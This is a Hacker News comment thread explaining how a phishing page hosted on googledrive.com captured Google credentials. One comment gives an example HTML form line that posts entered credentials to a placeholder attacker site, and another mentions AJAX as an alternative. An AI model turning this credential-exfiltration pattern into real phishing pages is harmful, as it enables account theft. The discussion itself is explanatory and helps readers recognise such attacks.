Hacker News new | past | comments | ask | show | jobs | submit login

After pressing "Sign in", the user’s credentials are sent to a PHP script on a compromised web server.

I might be missing something, but how does this part work?

Is it because the document in the Google Drive folder is actually a html document that the browser is loading (and executing javascript of)?




My guess would be:

Using something like:<form action="somebadsite.com/script.php">

So the credentials entered get submitted to the form which is sent via POST request to an external server. From there they can do whatever they want with the credentials (perhaps save them to a db) then redirect back to google docs.


AFAIK, it's not a legitimate login form. It's a attacker-created form that just looks like the login form. The trick is that they used Google Docs to host it on a .google.com server.


it wasn't actually hosted on a .google.com domain. It was googledrive.com, which is also owned by Google, but you should never expect a login form on that domain.


Thanks, the article was not very clear about that part.


It's probably using a form tag in the html. The data entered would be sent as a POST request to the external site.

Or it could be trough JavaScript which would Ajax the data to the external site.


The latter would require a cross domain ajax request, I'm sure it is just a regular form POST.




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: